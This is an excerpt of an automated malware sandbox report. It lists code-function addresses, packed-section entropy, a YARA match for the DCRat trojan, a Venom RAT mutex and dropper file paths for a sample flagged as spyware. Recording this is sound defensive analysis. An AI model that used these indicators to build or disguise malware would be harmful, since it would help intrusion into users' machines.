Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F31A8	0_2_006F31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C7B6E	0_2_007C7B6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B4B30	0_2_006B4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F2D10	0_2_006F2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B4DE0	0_2_006B4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E7F36	0_2_006E7F36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F779B	0_2_006F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B278BB	1_2_00B278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B28860	1_2_00B28860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B27049	1_2_00B27049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B231A8	1_2_00B231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00AE4B30	1_2_00AE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00AE4DE0	1_2_00AE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B22D10	1_2_00B22D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B2779B	1_2_00B2779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B17F36	1_2_00B17F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B278BB	2_2_00B278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B28860	2_2_00B28860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B27049	2_2_00B27049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B231A8	2_2_00B231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00AE4B30	2_2_00AE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00AE4DE0	2_2_00AE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B22D10	2_2_00B22D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B2779B	2_2_00B2779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B17F36	2_2_00B17F36
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3E35A0	14_2_6D3E35A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3FFD00	14_2_6D3FFD00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40ED10	14_2_6D40ED10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D410512	14_2_6D410512
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D420DD0	14_2_6D420DD0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4485F0	14_2_6D4485F0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D45545C	14_2_6D45545C
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D45AC00	14_2_6D45AC00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D425C10	14_2_6D425C10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D432C10	14_2_6D432C10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D45542B	14_2_6D45542B
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F5440	14_2_6D3F5440
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40D4D0	14_2_6D40D4D0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D426CF0	14_2_6D426CF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F6C80	14_2_6D3F6C80
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3ED4E0	14_2_6D3ED4E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4434A0	14_2_6D4434A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D44C4A0	14_2_6D44C4A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F64C0	14_2_6D3F64C0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F9F00	14_2_6D3F9F00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D427710	14_2_6D427710
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D416FF0	14_2_6D416FF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EDFE0	14_2_6D3EDFE0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4377A0	14_2_6D4377A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D404640	14_2_6D404640
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D432E4E	14_2_6D432E4E
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D409E50	14_2_6D409E50
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D423E50	14_2_6D423E50
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D456E63	14_2_6D456E63
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D435600	14_2_6D435600
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EC670	14_2_6D3EC670
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D427E10	14_2_6D427E10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D449E30	14_2_6D449E30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4576E3	14_2_6D4576E3
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D44E680	14_2_6D44E680
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EBEF0	14_2_6D3EBEF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3FFEF0	14_2_6D3FFEF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D405E90	14_2_6D405E90
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D444EA0	14_2_6D444EA0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40A940	14_2_6D40A940
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D43B970	14_2_6D43B970
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D45B170	14_2_6D45B170
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3FD960	14_2_6D3FD960
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EC9A0	14_2_6D3EC9A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D425190	14_2_6D425190
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D442990	14_2_6D442990
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D41D9B0	14_2_6D41D9B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D408850	14_2_6D408850
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40D850	14_2_6D40D850
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3F7810	14_2_6D3F7810
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D42F070	14_2_6D42F070
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D42B820	14_2_6D42B820
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D434820	14_2_6D434820
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4550C7	14_2_6D4550C7
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40C0E0	14_2_6D40C0E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4258E0	14_2_6D4258E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4160A0	14_2_6D4160A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3FC370	14_2_6D3FC370
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D42D320	14_2_6D42D320
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3E5340	14_2_6D3E5340
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4553C8	14_2_6D4553C8
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EF380	14_2_6D3EF380
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D429A60	14_2_6D429A60
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D428AC0	14_2_6D428AC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3FCAB0	14_2_6D3FCAB0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3E22A0	14_2_6D3E22A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D401AF0	14_2_6D401AF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D42E2F0	14_2_6D42E2F0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D45BA90	14_2_6D45BA90
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D414AA0	14_2_6D414AA0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D452AB0	14_2_6D452AB0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5BAD50	14_2_6D5BAD50
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D55ED70	14_2_6D55ED70
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D618D20	14_2_6D618D20
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D61CDC0	14_2_6D61CDC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D526D90	14_2_6D526D90
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D494DB0	14_2_6D494DB0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D49AC60	14_2_6D49AC60
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D556C00	14_2_6D556C00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D56AC30	14_2_6D56AC30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D48ECC0	14_2_6D48ECC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4EECD0	14_2_6D4EECD0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4FEF40	14_2_6D4FEF40
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D552F70	14_2_6D552F70
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D496F10	14_2_6D496F10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D0F20	14_2_6D5D0F20
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D56EFF0	14_2_6D56EFF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D490FE0	14_2_6D490FE0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D8FB0	14_2_6D5D8FB0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D49EFB0	14_2_6D49EFB0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D52EE70	14_2_6D52EE70
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D570E20	14_2_6D570E20
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D49AEC0	14_2_6D49AEC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D530EC0	14_2_6D530EC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D516E90	14_2_6D516E90
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4C8960	14_2_6D4C8960
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4E6900	14_2_6D4E6900
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5AC9E0	14_2_6D5AC9E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4C49F0	14_2_6D4C49F0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5509B0	14_2_6D5509B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5209A0	14_2_6D5209A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D54A9A0	14_2_6D54A9A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D564840	14_2_6D564840
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4E0820	14_2_6D4E0820
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D51A820	14_2_6D51A820
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5968E0	14_2_6D5968E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D596BE0	14_2_6D596BE0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D530BA0	14_2_6D530BA0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D50CA70	14_2_6D50CA70
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D53EA00	14_2_6D53EA00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D548A30	14_2_6D548A30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D50EA80	14_2_6D50EA80
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D8550	14_2_6D5D8550
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4E8540	14_2_6D4E8540
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D594540	14_2_6D594540
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D530570	14_2_6D530570
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F2560	14_2_6D4F2560
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D51E5F0	14_2_6D51E5F0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D55A5E0	14_2_6D55A5E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4845B0	14_2_6D4845B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4A8460	14_2_6D4A8460
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D51A430	14_2_6D51A430
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F4420	14_2_6D4F4420
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D52A4D0	14_2_6D52A4D0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4D64D0	14_2_6D4D64D0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5BA480	14_2_6D5BA480
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D510700	14_2_6D510700
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4BA7D0	14_2_6D4BA7D0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4EC650	14_2_6D4EC650
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4B46D0	14_2_6D4B46D0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4EE6E0	14_2_6D4EE6E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D52E6E0	14_2_6D52E6E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F8140	14_2_6D4F8140
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D506130	14_2_6D506130
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D574130	14_2_6D574130
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4901E0	14_2_6D4901E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4DE070	14_2_6D4DE070
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D558010	14_2_6D558010
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D55C000	14_2_6D55C000
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D488090	14_2_6D488090
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D56C0B0	14_2_6D56C0B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4A00B0	14_2_6D4A00B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D498340	14_2_6D498340
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D526370	14_2_6D526370
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D2370	14_2_6D5D2370
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D492370	14_2_6D492370
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5AC360	14_2_6D5AC360
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D502320	14_2_6D502320
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4E43E0	14_2_6D4E43E0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4C23A0	14_2_6D4C23A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4EE3B0	14_2_6D4EE3B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D528250	14_2_6D528250
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D518260	14_2_6D518260
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D55A210	14_2_6D55A210
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D568220	14_2_6D568220
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D6162C0	14_2_6D6162C0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D55E2B0	14_2_6D55E2B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5622A0	14_2_6D5622A0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F3D00	14_2_6D4F3D00
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D561DC0	14_2_6D561DC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D483D80	14_2_6D483D80
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D9D90	14_2_6D5D9D90
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D493C40	14_2_6D493C40
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5B9C40	14_2_6D5B9C40
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4A1C30	14_2_6D4A1C30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5CDCD0	14_2_6D5CDCD0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D551CE0	14_2_6D551CE0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D52FC80	14_2_6D52FC80
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4C5F20	14_2_6D4C5F20
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D485F30	14_2_6D485F30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5E7F20	14_2_6D5E7F20
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5ADFC0	14_2_6D5ADFC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D613FC0	14_2_6D613FC0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D53BFF0	14_2_6D53BFF0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4B1F90	14_2_6D4B1F90

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 006C80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D6109D0 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D41CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D4B3620 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D5C9F30 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D4294D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: String function: 6D4B9B10 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AF80C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00AFDF80 appears 36 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP

Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: H9TU4oY[1].exe.6.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: H9TU4oY[1].exe.6.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: H9TU4oY.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0001672196061644
Source: H9TU4oY.exe.6.dr	Static PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
Source: ZiYbk6W[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9986866918103449
Source: ZiYbk6W[1].exe.6.dr	Static PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
Source: ZiYbk6W.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9986866918103449
Source: ZiYbk6W.exe.6.dr	Static PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
Source: random[1].exe0.6.dr	Static PE information: Section: ZLIB complexity 1.000187285958904
Source: random[1].exe0.6.dr	Static PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
Source: c1ca3b12e5.exe.6.dr	Static PE information: Section: ZLIB complexity 1.000187285958904
Source: c1ca3b12e5.exe.6.dr	Static PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
Source: random[1].exe1.6.dr	Static PE information: Section: asolipax ZLIB complexity 0.9945088370901639
Source: 232a1df2aa.exe.6.dr	Static PE information: Section: asolipax ZLIB complexity 0.9945088370901639

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@103/23@150/25

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D447030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

14_2_6D447030

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Mutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
